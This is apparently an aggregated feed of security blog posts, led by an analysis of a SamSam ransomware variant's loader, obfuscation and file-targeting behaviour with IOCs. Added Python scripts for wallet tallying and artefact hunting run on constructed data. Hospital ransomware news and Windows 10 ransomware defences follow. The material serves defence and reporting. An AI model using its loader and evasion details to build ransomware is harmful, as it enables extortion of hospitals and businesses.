The malware does not enumerate or modify other files; it only encrypts a file when the user opens it, by replacing its content. For all these reasons, automatically detecting this behavior as ransomware can be challenging if only generic behavioral techniques are used. A much more effective approach is instead a combination of static and dynamic analysis aimed at detecting as many behaviors as possible, hunting for even mildly suspicious ones such as modifying the macro code or altering the template file.

The post qkG: Simple Malware, Tricky Ransomware appeared first on Lastline.

SamSam – The Evolution Continues Netting Over $325,000 in 4 Weeks


This post was written by Vitor Ventura

Introduction


Talos has been working in conjunction with Cisco IR Services on what we believe to be a new variant of the SamSam ransomware. This ransomware has been observed across multiple industries including Government, Healthcare and ICS. These attacks do not appear to be highly targeted, and appear to be more opportunistic in nature.

Given SamSam's victimology, its impacts are not just felt within the business world, they are also impacting people, especially if we consider the Healthcare sector. Non-urgent surgeries can always be rescheduled but if we take as an example patients where the medical history and former medical treatment are crucial the impact may be more severe. Furthermore, many critical life savings medical devices are now highly computerized. Ransomware can impact the operation of these devices making it very difficult for medical personnel to diagnose and treat patients leading to potentially life threatening situations. Equipment that might be needed in time-sensitive operations may be made unavailable due to the computer used to operate the equipment being unavailable.

The initial infection vector for these ongoing attacks is currently unknown, and Talos is investigating in order to identify it. The history of SamSam indicates that the attackers may follow their previous modus operandi of exploiting a host and then moving laterally within the target environment to plant and later run the SamSam ransomware. During a previous wave of SamSam attacks in 2016, we observed the adversaries attacking vulnerable JBoss hosts. Although the infection vector for the new variant is not yet confirmed, there is a possibility that compromised RDP/VNC servers have played a part in allowing the attackers to obtain an initial foothold.


There are no differences between the encryption mechanism used by this current SamSam variant compared to older versions. However, this time the adversaries have added some string obfuscation and improved the anti-analysis techniques used to make detection and analysis marginally more difficult.

This new variant is deployed using a loader which decrypts and executes an encrypted ransomware payload; this loader/payload model is an improvement in the anti-forensic methods used by the malware. Samples containing this loader mechanism have been found as far back as October 2017. The wallet used by SamSam for this wave is shared by multiple infected victims, as observed by monitoring the wallet at 1MddNhqRCJe825ywjdbjbAQpstWBpKHmFR. We are also able to confirm that the first payment into this wallet was received on 25th December 2017 - a nice holiday gift for this adversary. This can be confirmed by observing the first transaction for the wallet on the Bitcoin blockchain. Other Bitcoin wallets may also be in use, but Talos is currently unaware of any others.

Similar to the previous variants, we believe the deployment of this SamSam variant to be highly manual, meaning an adversary must take manual action in order to execute the malware. The symmetric encryption keys are randomly generated for each file. The Tor onion service and the Bitcoin wallet address are hardcoded into the payload whilst the public key is stored in an external file with the extension .keyxml.

Additionally, code analysis didn't find any kind of automated mechanism for contacting the Tor Service address which means that the victim identification with the associated RSA private key must be done either manually or by another adversary tool.

Ransom note displayed by SamSam new variant

In most ransomware the attackers try to convince affected users that they have the ability to decrypt the data after the payment is made. SamSam is no different here and even displays a disclaimer as seen in the above screenshot, stating 'we don't want to damage our reliability' and 'we are honest'.

To this end SamSam adversaries offer free decryption of two files and an additional free key to decrypt one server. Once again SamSam actors show their ability to monitor and laterally move through the network by pointing out they will only provide a key if they believe the server is not an important piece of infrastructure. As with previous versions of SamSam they are advising that messaging the attackers can be performed via their site.

The "Runner"


The adversary has changed their deployment methodology and now uses a loader mechanism called "runner" to execute the payload. Upon execution, the loader searches for files with the extension .stubbin in its execution directory; this file contains the SamSam encrypted .NET assembly payload. Upon reading the file, the loader decrypts the payload with the password supplied as the first argument and executes it, passing the remaining arguments.

The loader is a very simple .NET assembly with no obfuscation. Comparing both the Initialization Vector (IV) and the code structure it seems like it may have been derived from an example posted on the Codeproject.com website.

As you can see in the images below, the IV used for the Rijndael encryption is the same in both implementations (the posted code shows it in hexadecimal, the reversed code in decimal because of how the decompiler renders it).

Posted code | Reversed code


At the code level looking specifically at the function 'Decrypt', it is obvious that the code structure in the Codeproject source and the latest SamSam runner sample is the same (comments from the posted code were removed).

Encryption routine source code comparison

The Payload


Previous versions of SamSam put some effort into the obfuscation of the malware code by encrypting strings with AES. The new version also obfuscates functions, class names and strings, including the list of targeted file extensions, the help file contents and environment variables, this time using DES encryption with a fixed hard-coded key and IV.


Once again, the adversary has put more effort into preventing forensic recovery of the malware sample itself than into obfuscating the running malware code, which allowed us to reverse engineer this sample.

As mentioned before, the password to decrypt the payload is passed as a parameter to the loader, which reduces the chances of obtaining the payload for analysis.

Previous versions of SamSam had an equivalent method for making payload access difficult by launching a thread that would wait 1 second before deleting itself from the hard disk.

The comparison of the main encryption routines between the old and the new samples indicates that this version of SamSam is similar enough to have high confidence that it belongs to the same malware family.

Encryption Routine Comparison

While previous SamSam versions used the API call DriveInfo.GetDrives() to obtain the list of available drives, this new version has the drive letters hardcoded. After checking that a drive is ready it starts a search for targeted files on the non-blacklisted folder paths.

The new variant keeps the same list of targeted file extensions as some of the previous ones. It adds a few new entries to the list of paths not to encrypt, which includes user profiles "All Users", "default" and the boot directory.

This is in tune with most ransomware which attempt to preserve the operability of the victim's machine. If the machine operation is so damaged that the system cannot be booted then the victim will be unable to pay, whereas if they keep the machine able to function, with limited access to files/folders, then they have a greater chance of a victim paying for recovering their important files and documents.



Just like previous versions of SamSam the new version is especially careful to make sure that there is enough space on the current drive to create the encrypted document, thus avoiding any corruption that would lead to irrecoverable encryption.



Unlike most ransomware, SamSam does not delete Volume Shadow Copies; it creates an encrypted version of the original file and then deletes the original using the regular Windows API. Although unlikely, because the freed blocks are overwritten, recovery of the original files from the previous versions of affected folders saved by the operating system may be possible.

Profitability


In identifying the scope of this SamSam campaign, Talos analyzed the Bitcoin wallet addresses used by the attackers in each of these attacks. As of the time of this writing, the attackers have received approximately 30.4 BTC which equals $325,217.07. As previously mentioned, it is possible that the attackers are leveraging multiple bitcoin wallets, however Talos has not observed any other than the one listed here being used in these attacks.
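The wallet tally above is the kind of check an analyst repeats when scoping a campaign. The following is an added example, not Talos code, showing the method on constructed transaction records (the sample data is invented and does not reproduce the real history of the wallet in the post; the field names are a simplified, assumed layout rather than any particular blockchain API's). The point it makes is that transactions in which the wallet itself is an input are the actor moving funds and must be excluded, otherwise change outputs get counted as victim payments.

```python
"""Summarise victim payments into a ransom wallet from transaction records.

Added example, not Talos code. Sample transactions below are constructed;
values are in satoshi and the record layout is an assumption for this demo.
"""
from datetime import datetime, timezone

WALLET = "1MddNhqRCJe825ywjdbjbAQpstWBpKHmFR"  # wallet address from the post

# Constructed sample (not real blockchain data); timestamps are Unix seconds (UTC)
SAMPLE_TXS = [
    {"txid": "tx-a", "time": 1514160000,  # 2017-12-25
     "inputs": [{"addr": "1PayerOne", "value": 260_000_000}],
     "outputs": [{"addr": WALLET, "value": 250_000_000},
                 {"addr": "1PayerOne", "value": 9_990_000}]},
    {"txid": "tx-b", "time": 1514764800,  # 2018-01-01
     "inputs": [{"addr": "1PayerTwo", "value": 500_000_000}],
     "outputs": [{"addr": WALLET, "value": 490_000_000}]},
    {"txid": "tx-c", "time": 1515000000,  # actor sweeps funds out: not a payment
     "inputs": [{"addr": WALLET, "value": 740_000_000}],
     "outputs": [{"addr": "1Cashout", "value": 739_000_000}]},
    {"txid": "tx-d", "time": 1515100000,  # partial spend with change back to the wallet
     "inputs": [{"addr": WALLET, "value": 100_000_000}],
     "outputs": [{"addr": "1Cashout", "value": 60_000_000},
                 {"addr": WALLET, "value": 39_990_000}]},
]


def summarise(txs, wallet=WALLET):
    """Count inbound payments, total BTC received, distinct payers and first payment date."""
    received_sat = 0
    payers = set()
    first_seen = None
    payments = 0
    for tx in sorted(txs, key=lambda t: t["time"]):
        # If the wallet funds the transaction, any output back to it is change, not income
        if any(i["addr"] == wallet for i in tx["inputs"]):
            continue
        credit = sum(o["value"] for o in tx["outputs"] if o["addr"] == wallet)
        if credit == 0:
            continue
        payments += 1
        received_sat += credit
        payers.update(i["addr"] for i in tx["inputs"])
        if first_seen is None:
            first_seen = tx["time"]
    first_date = (datetime.fromtimestamp(first_seen, timezone.utc).date().isoformat()
                  if first_seen is not None else None)
    return {
        "payments": payments,
        "received_btc": received_sat / 1e8,
        "distinct_payers": len(payers),
        "first_payment_utc": first_date,
    }


if __name__ == "__main__":
    print(summarise(SAMPLE_TXS))
```

On the constructed data this reports two payments totalling 7.4 BTC from two distinct payers, first seen on 2017-12-25; tx-c and tx-d are ignored because the wallet is the spender. The same exclusion rule is what keeps a real tally honest when the actor consolidates or cashes out.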


Recommendations


As the specific initial threat vector is not known at this time, best practices should be implemented to minimize risk to organizations. Talos has outlined several best practices that should be considered in a previous blog related to defending against ransomware related threats. In accordance with best practices, protocols like SMB or RDP should never be internet facing.

IOCs

SHA256s

0785bb93fdb219ea8cb1673de1166bea839da8ba6d7312284d2a08bd41e38cb9
338fdf3626aa4a48a5972f291aacf3d6172dd920fe16ac4da4dd6c5b999d2f13
3531bb1077c64840b9c95c45d382448abffa4f386ad88e125c96a38166832252
4856f898cd27fd2fed1ea33b4d463a6ae89a9ccee49b134ea8b5492cb447fb75
516fb821ee6c19cf2873e637c21be7603e7a39720c7d6d71a8c19d8d717a2495
72832db9b951663b8f322778440b8720ea95cde0349a1d26477edd95b3915479
754fab056e0319408227ad07670b77dde2414597ff5e154856ecae5e14415e1a
88d24b497cfeb47ec6719752f2af00c802c38e7d4b5d526311d552c6d5f4ad34
88e344977bf6451e15fe202d65471a5f75d22370050fe6ba4dfa2c2d0fae7828
8eabfa74d88e439cfca9ccabd0ee34422892d8e58331a63bea94a7c4140cf7ab
8f803b66f6c6bc4da9211a2c4c4c5b46a113201ecaf056d35cad325ec4054656
dabc0f171b55f4aff88f32871374bf09da83668e1db2d2c18b0cd58ed04f0707
e7bebd1b1419f42293732c70095f35c8310fa3afee55f1df68d4fe6bbee5397e

BTC Wallet

1MddNhqRCJe825ywjdbjbAQpstWBpKHmFR

Tor onion service

jcmi5n4c3mvgtyt5.onion

References:


https://www.codeproject.com/kb/security/dotnetcrypto.aspx?msg=1790665

Detection


Snort Rules: 45484-45486

AMP for Endpoints: Ensure the TETRA engine and ‘Command Line Capture’ are enabled and client is v6.05+
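The "Runner" and "Payload" sections above give a defender two host artefacts worth hunting for beyond the hashes: the .stubbin file the loader expects beside itself, and the .keyxml file holding the RSA public key. The following is an added example, not Talos or Cisco code, that runs those checks over constructed Sysmon-style file-create (Event ID 11) and process-create (Event ID 1) events; the event field names follow Sysmon's, the sample events and paths are invented, and the hash set is the SHA256 list from the IOC section. It also correlates the two: a process starting from a directory that earlier received a .stubbin file is flagged, since that is exactly where the runner looks for its payload.

```python
"""Hunt for SamSam loader/payload artefacts in Sysmon-like events.

Added example, not Talos code. Events below are constructed, not real telemetry.
"""
import ntpath
import re
from dataclasses import dataclass

# SHA256 hashes from the post's IOC section
SAMSAM_SHA256 = {
    "0785bb93fdb219ea8cb1673de1166bea839da8ba6d7312284d2a08bd41e38cb9",
    "338fdf3626aa4a48a5972f291aacf3d6172dd920fe16ac4da4dd6c5b999d2f13",
    "3531bb1077c64840b9c95c45d382448abffa4f386ad88e125c96a38166832252",
    "4856f898cd27fd2fed1ea33b4d463a6ae89a9ccee49b134ea8b5492cb447fb75",
    "516fb821ee6c19cf2873e637c21be7603e7a39720c7d6d71a8c19d8d717a2495",
    "72832db9b951663b8f322778440b8720ea95cde0349a1d26477edd95b3915479",
    "754fab056e0319408227ad07670b77dde2414597ff5e154856ecae5e14415e1a",
    "88d24b497cfeb47ec6719752f2af00c802c38e7d4b5d526311d552c6d5f4ad34",
    "88e344977bf6451e15fe202d65471a5f75d22370050fe6ba4dfa2c2d0fae7828",
    "8eabfa74d88e439cfca9ccabd0ee34422892d8e58331a63bea94a7c4140cf7ab",
    "8f803b66f6c6bc4da9211a2c4c4c5b46a113201ecaf056d35cad325ec4054656",
    "dabc0f171b55f4aff88f32871374bf09da83668e1db2d2c18b0cd58ed04f0707",
    "e7bebd1b1419f42293732c70095f35c8310fa3afee55f1df68d4fe6bbee5397e",
}

# Extensions the post ties to the loader (.stubbin) and the RSA public key (.keyxml)
SUSPICIOUS_EXTENSIONS = {".stubbin", ".keyxml"}

SHA256_RE = re.compile(r"SHA256=([0-9a-fA-F]{64})")  # Sysmon "Hashes" field format


@dataclass
class Finding:
    record: int   # index of the triggering event in the input stream
    reason: str
    detail: str


def _ext(path):
    return ntpath.splitext(path)[1].lower()


def _dir(path):
    return ntpath.dirname(path).lower()


def hunt(events):
    """Return findings for a time-ordered list of event dicts (EventID 1 or 11)."""
    findings = []
    payload_dirs = set()  # directories where a .stubbin file has been written
    for i, ev in enumerate(events):
        eid = ev.get("EventID")
        if eid == 11:
            target = ev.get("TargetFilename", "")
            if _ext(target) in SUSPICIOUS_EXTENSIONS:
                findings.append(Finding(i, "suspicious_extension", target))
            if _ext(target) == ".stubbin":
                payload_dirs.add(_dir(target))
        elif eid == 1:
            image = ev.get("Image", "")
            m = SHA256_RE.search(ev.get("Hashes", ""))
            if m and m.group(1).lower() in SAMSAM_SHA256:
                findings.append(Finding(i, "known_samsam_hash", image))
            # The runner reads .stubbin from its own execution directory, so a process
            # launched from a directory that just received one deserves a look
            if _dir(image) in payload_dirs:
                findings.append(Finding(i, "process_beside_stubbin_payload", image))
    return findings


# Constructed sample events (not real telemetry), in time order
SAMPLE_EVENTS = [
    {"EventID": 11, "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\Public\tools\payload.stubbin"},
    {"EventID": 11, "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\Public\tools\pub.keyxml"},
    {"EventID": 1, "Image": r"C:\Users\Public\tools\runner.exe",
     "CommandLine": r'"C:\Users\Public\tools\runner.exe" <password-argument>',
     "Hashes": "SHA256=0785bb93fdb219ea8cb1673de1166bea839da8ba6d7312284d2a08bd41e38cb9"},
    {"EventID": 1, "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs",
     "Hashes": "SHA256=" + "0" * 64},
    {"EventID": 11, "Image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "TargetFilename": r"C:\Users\alice\Documents\report.docx"},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f.reason}] event #{f.record}: {f.detail}")
```

On the sample stream this yields four findings: the two file writes by extension, and two on the runner process (hash match, and launch from the .stubbin directory). The directory correlation is the useful part when the hashes have already rotated: it depends only on the deployment pattern the post describes, not on a particular sample.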

Another Indiana Hospital Hit by Ransomware Attack

Another hospital in Indiana has suffered a ransomware attack that affected some of its servers and prevented files from loading correctly. On 11 January, an employee of Adams Memorial Hospital of Decatur, Indiana notified administrators that some files didn’t look correct. Susan Sefton, a spokesperson for the hospital, said the network went blank before files […]

The post Another Indiana Hospital Hit by Ransomware Attack appeared first on The State of Security.

Is 2018 the year cybercrime becomes mainstream?

The issue of cybercrime was thrust into international conversation last year, but what will the phenomenon look like in 2018? Cryptocurrencies will continue to be a driver for cybercrime. This is

The post Is 2018 the year cybercrime becomes mainstream? appeared first on The Cyber Security Place.

McAfee Blogs: How Pseudo-ransomware KillDisk Creates a Smoke Screen for Cybercriminals

We all remember Petya/NotPetya. How could you forget? The nasty malware took cues from WannaCry, leveraging the same SMB vulnerability. But instead of locking away files, Petya/NotPetya was a wiper – simply cleaning devices of their data. Petya was not the first wiper we’ve seen, and it’s certainly not the last. In fact, a classic disk wiper is currently re-emerging in Latin America, called KillDisk, and is targeting financial firms. Once dropped on a computer, it will load itself into memory, delete its files from disk, and rename itself.

KillDisk is actually one of the most infamous malware families around. It has historically masked itself as ransomware, but is rather a very destructive wiper. Cybercriminals typically deploy it in the later stages of an infection so they can use it to hide their tracks by wiping disks and destroying forensic evidence. That’s precisely why it was paired together with the BlackEnergy malware during Telebots’ attacks on the Ukrainian power grid – so the cybercriminals could conduct their scheme with stealth.

As Christiaan Beek, lead scientist and principal engineer at McAfee claims – that’s a wiper’s bread and butter. He says, “In the past we have seen wipers being used targeting the Energy sector in the Ukraine, Oil & Gas industry in the Middle-East, Media-company and against targets in South Korea. All of these were related to regional or political conflicts.”

Destruction is clearly the end goal, but stealth is the way of getting there. Beek continues, “In 2017, we introduced the term pseudo-ransomware where destructive attacks disguised as ransomware either took down companies in a nation or were used to keep the IT-department busy while money was being transferred at the same time. Now with KillDisk, it seems that criminals do not hesitate to use it during their campaigns. Since the initial infection vector is unknown and we are lacking further samples or details, we can only speculate why they are using this.”

That’s the ultimate question – why? Is KillDisk part of a larger attack, intended to help cybercriminals avoid detection? Or are crooks extorting these financial institutions for monetary gain? As of now, we’re unsure of the motive. But we do know that as this threat continues to evolve and creates a convincing smoke screen, we all must be as vigilant as ever.

To learn more about our fight against ransomware, check out the alliance No More Ransom. And be sure to follow us at @McAfee and @McAfee_Labs.

The post How Pseudo-ransomware KillDisk Creates a Smoke Screen for Cybercriminals appeared first on McAfee Blogs.




Webroot Threat Blog: Cyber News Rundown: Healthcare Ransomware

The Cyber News Rundown brings you the latest happenings in cybersecurity news weekly. Who am I? I’m Connor Madsen, a Webroot Threat Research Analyst, and a guy with a passion for all things security. Any questions? Just ask.

Hospital Pays Ransom to Restore Systems, Despite Having Backups

In the first cyberattack of 2018 to hit a healthcare organization, an Indiana hospital’s entire network was taken offline. Despite having full backups on-hand, the hospital paid the $55,000 Bitcoin ransom right away. Officials stated they paid the ransom to get the systems back to normal as quickly as possible, since restoring everything from their backups could have taken weeks. Fortunately for patients, no data was stolen, and the staff could continue assisting new arrivals the old-fashioned way (that’s right: pen and paper) until system functionality was restored.

Audio Attacks Used for Damaging Hard Drives

A recent collaborative study performed by two universities proved that, within a reasonable proximity, an attacker could use acoustic signals to target a hard disk drive, leading to data corruption on the device. While many people could explain why this type of attack is possible, the study determined that the attacks required not only a specific frequency based on the hard drive in question, but also a precise distance from the drive and angle of sound projection to execute a successful attack.

New Android Platform Takes Spying to New Heights

A new Android spying platform has been discovered that puts all its predecessors to shame. By implementing several new features, such as location-based audio recording, compromising WhatsApp messages, and even allowing attackers to connect the device to malicious WiFi networks, this software platform gives attackers an all-new range of methods to target victims. The platform is based around five known exploits in the Android OS, and it uses them to gain administrative access to the device.

Latest Netflix Phish Asks for User Selfie

Within the last week, a new email phishing campaign has been spotted targeting Netflix users. The email informs users that a “hold” has been placed on their account pending further information. It requests users upload a photo of themselves with an ID card and prompts them to update their billing information, before redirecting them to the real Netflix login page.

RubyMiner Found on Older Linux and Windows Servers

A new cryptocurrency miner variant has been targeting outdated system servers that run both Linux and Windows. The variant, known as RubyMiner, identifies the unsecured servers using a web server tool, then gains access via a variety of exploits to install a modified Monero miner. RubyMiner deviates from similar miners in that it focuses on machines that have likely been forgotten about, and so remain on without being regularly patched.

The post Cyber News Rundown: Healthcare Ransomware appeared first on Webroot Threat Blog.




HOTforSecurity: ‘Im Sorry’ – Second Indiana hospital hit by ransomware

The very day that Hancock Health fell victim to a ransomware attack, another hospital in Indiana suffered a similar breach. Adams Health Network, which runs Adams Memorial Hospital, said the attack did not affect the quality and safety of patient care.

As the story goes, on December 11 an employee at Adams Memorial Hospital noticed strange network behavior and alerted IT administrators. Susan Sefton, a spokesperson for Adams Memorial Hospital, said the network went blank before files on the system read “sorry.”

If Sefton’s recollection is correct, it appears Adams Memorial was hit by a relatively well-known strain of ransomware dubbed “Im Sorry.”

Uncovered in 2017, Im Sorry encrypts files on the computer it has infected and appends file names with the “.imsorry” extension. For instance, a Word document titled “Filename.docx” will be renamed to “Filename.docx.imsorry.”

After it encrypts files on a system, the ransomware creates a text file containing instructions telling users how and where to pay a ransom to decrypt them. The .txt file is placed in each folder that has encrypted files.

As a result of the breach, doctors could not access patient history or appointment schedules, according to local newspaper wane.com. Sefton said the attack affected 60 to 80 patients. At first, the hospital avoided making the attack public, attributing the outage to bad weather. Then, it released the following statement:

“While AHN did experience a business interruption throughout the weekend as we worked to restore the affected servers, there was never an interruption in patient care. We are continuing to assess the severity of the situation, but at this time we believe no patient files have been accessed. At no time during this event has the quality and safety of patient care been affected.”

The hospital got hit on the same day that Hancock Health, another healthcare operator based in the state of Indiana, confirmed it fell victim to an almost identical attack. While Adams has not yet said if it has paid or will pay the ransom, Hancock has reportedly already paid the attacker $50,000 in digital currency to have its files decrypted.



The rise of ransom hacks, and the potential impact on your business

The percentage of companies reporting financially motivated cyber attacks has doubled over the past two years, with 50% of companies experiencing a cyber attack motivated by ransom in the past year, according to Radware. As the value of bitcoin and other cryptocurrencies has appreciated, ransom attacks provide an opportunity for hackers to cash out for lucrative gains months later.

Ransom attacks

“The rapid adoption of cryptocurrencies and their subsequent rise in price has presented hackers …

Hospital Shut Down Its Computer Network Following Ransomware Attack

A hospital shut down its network after a ransomware attack restricted authorized personnel access to some of its computer systems. On 12 January, Hancock Regional Hospital confirmed in a statement that it had suffered a ransomware attack. As quoted by FOX59: Hancock Regional Hospital has been the victim of a criminal act by an unknown […]

The post Hospital Shut Down Its Computer Network Following Ransomware Attack appeared first on The State of Security.

Ransomware attack drives Indianapolis hospital back to pen and paper

A hacker out to make a fast buck last week decided to hit an Indianapolis hospital with a ransomware attack, demanding a ransom payment to his Bitcoin wallet in exchange for de-crippling the facility’s computer network.

Hancock Health fell victim to the attack sometime last week, when employees noticed the network started running more slowly than normal, according to local newspaper The Greenfield Reporter.

One of the hospital’s computers then flashed a message indicative of a typical ransomware attack – that the facility’s data was being held “hostage” until a ransom was paid to the attacker.

The hacker, who infiltrated the network using a “sophisticated” attack, encrypted important parts of the Hancock Health network and demanded an undisclosed ransom in Bitcoin, a digital currency almost entirely untraceable in nature.

“This was not a 15-year-old kid sitting in his mother’s basement,” Hancock Health CEO Steve Long told reporters on Friday, after enlisting the help of the FBI and an unnamed security firm to learn more about the attack.

“That somebody would do this to a hospital really boggles the mind,” Long said.

According to the newspaper, the attack drove doctors and nurses back to using “pen and paper” to keep medical charts updated.

According to a recent survey by University of Phoenix College of Health Professions, hackers are increasingly targeting patient records as healthcare providers do little to protect their data. The key reason, according to a healthcare cyber research report for 2017: stolen medical records make for a lucrative extortion tool.

Patient records can be so valuable that some organizations will go to great lengths to obtain them, even if it means doing so without the patients’ consent.

An investigation by the Daily Telegraph has revealed that the data covering every case of lung cancer diagnosed in England over a four-year period was handed by NHS to a firm working with Philip Morris International for the past 30 years. Investigators reportedly fear that the anonymised data could be used in legal cases to downplay the dangers of smoking, or to fight regulation.

Coprocessor Attacks: the Hidden Threat

Botnets, DDoS and ransomware attacks, vulnerabilities in Internet of Things devices and Open Source Software, and the generally poor state of information security, dominate the discussion of cybersecurity. These same

The post Coprocessor Attacks: the Hidden Threat appeared first on The Cyber Security Place.

The network vulnerabilities hiding in plain sight

Any company wanting to redefine its network security strategies in the wake of substantial IoT growth should start with the following four steps. There is no denying that, for better or

The post The network vulnerabilities hiding in plain sight appeared first on The Cyber Security Place.

Unknown Hackers demand Ransom in Bitcoin

Recently, news emerged of a ransomware attack on traders in Old Delhi after three of the victims came forward to reveal more about the attack. The unknown hackers demanded that the victims, all traders, pay a ransom in Bitcoin.

The hackers, believed to be operating from either Nigeria or Pakistan, encrypted files containing key business records on the traders' computers. According to the police, the hackers then coerced the victims and gave them links to purchase bitcoins with which to pay for the release of the critical documents.

“Some traders paid in Bitcoins and got their data back. Some deposited the money from abroad. When my data was hacked, I spoke to fellow traders and learnt that there were other such cases. I wrote to the hackers and they agreed to decrypt the files for $1,750 (around Rs 1.11 lakh),” Mohan Goyal, one of the victims was quoted saying in the report.

According to reports, the hacked traders found a message on their computers saying there was a 'security issue' in the system. The traders were then given case numbers and email addresses for correspondence. The hackers at first offered to decrypt five of their documents and files for free, and later demanded a ransom for the rest of the records.

Although one of the IP addresses used by the hackers was reportedly traced back to a system in Germany, suspicion remains on hackers from Nigeria and Pakistan.

Experts say that receiving payment in bitcoin makes the money harder to trace, which works in the hackers' favour. The Delhi crime branch, which registered the FIR, has already sent the complainants' hard disks for forensic examination. So far, three complaints have been registered with the police, and the number of victims is believed to be much higher.

Hackers increasingly target patient records as HCPs do little to protect data – research

One in five healthcare professionals has experienced breaches of patient data, yet many also say they’re “very confident” in their facility’s ability to protect that data against theft, according to a survey by University of Phoenix College of Health Professions.

Despite increased data breaches in all industries, only a quarter of registered nurses (RNs) have seen changes in the way their companies handle data security over the past year.

The data also reveals a worrying disconnect between healthcare professionals’ confidence in protecting sensitive patient data and the actual protection of that data.

Some 48 percent of RNs and 57 percent of administrative staff say they are “very confident” their institution can safeguard patient records against potential data theft. At the same time, only 25 percent of RNs and 40 percent of administrative staff cited data security & privacy improvements over the past year.

The University acknowledges that the healthcare industry is “one of the highest targeted by cybercriminals, due to its heavy reliance on technology and vast amount of available patient data.”

Research by Cryptonite NXT supports this claim. According to the company’s Health Care Cyber Research Report for 2017, stolen medical records make for a terrific extortion tool.

One example is the London Bridge Plastic Surgery data breach three months ago, when The Dark Overlord cybercriminal group hacked the high-profile clinic and stole graphic images of celebrities undergoing plastic surgery. The purpose behind the breach was believed to be extortion. No reports confirm this theory, but it’s possible the group got what they were after and kept a lid on it.

Dennis Bonilla, executive dean for the College of Information Systems and Technology at University of Phoenix, believes healthcare providers (HCPs) are “extremely susceptible to human error.”

“If one employee accidently invites malicious malware into a system, the impact can be catastrophic. To limit the amount of breaches, cybersecurity governance must improve,” Bonilla said.

Again, the University’s findings can be easily supported with real-life examples. The WannaCry ransomware attack in May 2017 revealed just how easily malware could move laterally in a computer network.

As avid readers know, the UK’s National Health Service lost hundreds of thousands of patient records in the attack, which leveraged unpatched Windows computers. Patients with life-threatening conditions had to be put on hold, and the financial consequences to NHS were devastating.

On a positive note, nurses and staff administrators agree that additional support and training is needed for healthcare privacy and security. The survey also found that HCPs are taking some steps to better protect patient data, such as updated privacy and access policies, role-based access to sensitive information, and enhanced data surveillance.

A worthy upgrade: Next-gen security on Windows 10 proves resilient against ransomware outbreaks in 2017

Adopting reliable attack methods and techniques borrowed from more evolved threat types, ransomware attained new levels of reach and damage in 2017. The following trends characterize the ransomware narrative in the past year:

  • Three global outbreaks showed the force of ransomware in making real-world impact, affecting corporate networks and bringing down critical services like hospitals, transportation, and traffic systems
  • Three million unique computers encountered ransomware; millions more saw downloader trojans, exploits, emails, websites and other components of the ransomware kill chain
  • New attack vectors, including compromised supply chain, exploits, phishing emails, and documents taking advantage of the DDE feature in Office were used to deliver ransomware
  • More than 120 new ransomware families, plus countless variants of established families and less prevalent ransomware caught by heuristic and generic detections, emerged from a thriving cybercriminal enterprise powered by ransomware-as-a-service

The trend towards increasingly sophisticated malware behavior, highlighted by the use of exploits and other attack vectors, makes older platforms so much more susceptible to ransomware attacks. From June to November, Windows 7 devices were 3.4 times more likely to encounter ransomware compared to Windows 10 devices.

Figure 1. Ransomware encounter rates on Windows 7 and Windows 10 devices. Encounter rate refers to the percentage of computers running the OS version with Microsoft real-time security that blocked or detected ransomware.

The data shows that attackers are targeting Windows 7. Given today's modern threats, older platforms can be infiltrated more easily because these platforms don't have the advanced built-in end-to-end defense stack available on Windows 10. Continuous enhancements further make Windows 10 more resilient to ransomware and other types of attack.

Windows 10: Multi-layer defense against ransomware attacks

The year 2017 saw three global ransomware outbreaks driven by multiple propagation and infection techniques that are not necessarily new but not typically observed in ransomware. While there are technologies available on Windows 7 to mitigate attacks, Windows 10's comprehensive set of platform mitigations and next-generation technologies cover these attack methods. Additionally, Windows 10 S, which is a configuration of Windows 10 that's streamlined for security and performance, locks down devices against ransomware outbreaks and other threats.

In May, WannaCry (Ransom:Win32/WannaCrypt) caused the first global ransomware outbreak. It used EternalBlue, an exploit for a previously fixed SMBv1 vulnerability, to infect computers and spread across networks at speeds never before observed in ransomware.

On Windows 7, Windows AppLocker and antimalware solutions like Microsoft Security Essentials and System Center Endpoint Protection (SCEP) can block the infection process. However, because WannaCry used an exploit to spread and infect devices, networks with vulnerable Windows 7 devices fell victim. The WannaCry outbreak highlighted the importance of keeping platforms and software up-to-date, especially with critical security patches.

Windows 10 was not at risk from the WannaCry attack. Windows 10 has security technologies that can block the WannaCry ransomware and its spreading mechanism. Built-in exploit mitigations on Windows 10 (KASLR, NX HAL, and PAGE POOL), as well as kCFG (control-flow guard for kernel) and HVCI (kernel code-integrity), make Windows 10 much more difficult to exploit.

Figure 2. Windows 7 and Windows 10 platform defenses against WannaCry

In June, Petya (Ransom:Win32/Petya.B) used the same exploit that gave WannaCry its spreading capabilities, and added more propagation and infection methods to give birth to arguably the most complex ransomware in 2017. Petya's initial infection vector was a compromised software supply chain, but the ransomware quickly spread using the EternalBlue and EternalRomance exploits, as well as a module for lateral movement using stolen credentials.

On Windows 7, Windows AppLocker can stop Petya from infecting the device. If a Windows 7 device was fully patched, Petya's exploitation behavior did not work. However, Petya also stole credentials, which it then used to spread across networks. Once running on a Windows 7 device, only an up-to-date antivirus that had protection in place at zero hour could stop Petya from encrypting files or tampering with the master boot record (MBR).

On the other hand, on Windows 10, Petya had more layers of defenses to overcome. Apart from Windows AppLocker, Windows Defender Application Control can block Petya's entry vector (i.e., a compromised software updater running an untrusted binary), as well as the propagation techniques that used untrusted DLLs. Windows 10's built-in exploit mitigations can further protect Windows 10 devices from the Petya exploit. Credential Guard can prevent Petya from stealing credentials from the local security authority subsystem service (LSASS), helping curb the ransomware's propagation technique. Meanwhile, Windows Defender System Guard (Secure Boot) can stop the MBR modified by Petya from being loaded at boot time, preventing the ransomware from causing damage to the master file table (MFT).

Figure 3. Windows 7 and Windows 10 platform defenses against Petya

In October, another sophisticated ransomware reared its ugly head: Bad Rabbit ransomware (Ransom:Win32/Tibbar.A) infected devices by posing as an Adobe Flash installer available for download on compromised websites. Similar to WannaCry and Petya, Bad Rabbit had spreading capabilities, albeit more traditional: it used a hardcoded list of user names and passwords. Like Petya, it can also render infected devices unbootable, because, in addition to encrypting files, it also encrypted entire disks.

On Windows 7 devices, several security solutions and technologies can block the download and installation of the ransomware, but protecting the device from the damaging payload and from infecting other computers in the network can be tricky.

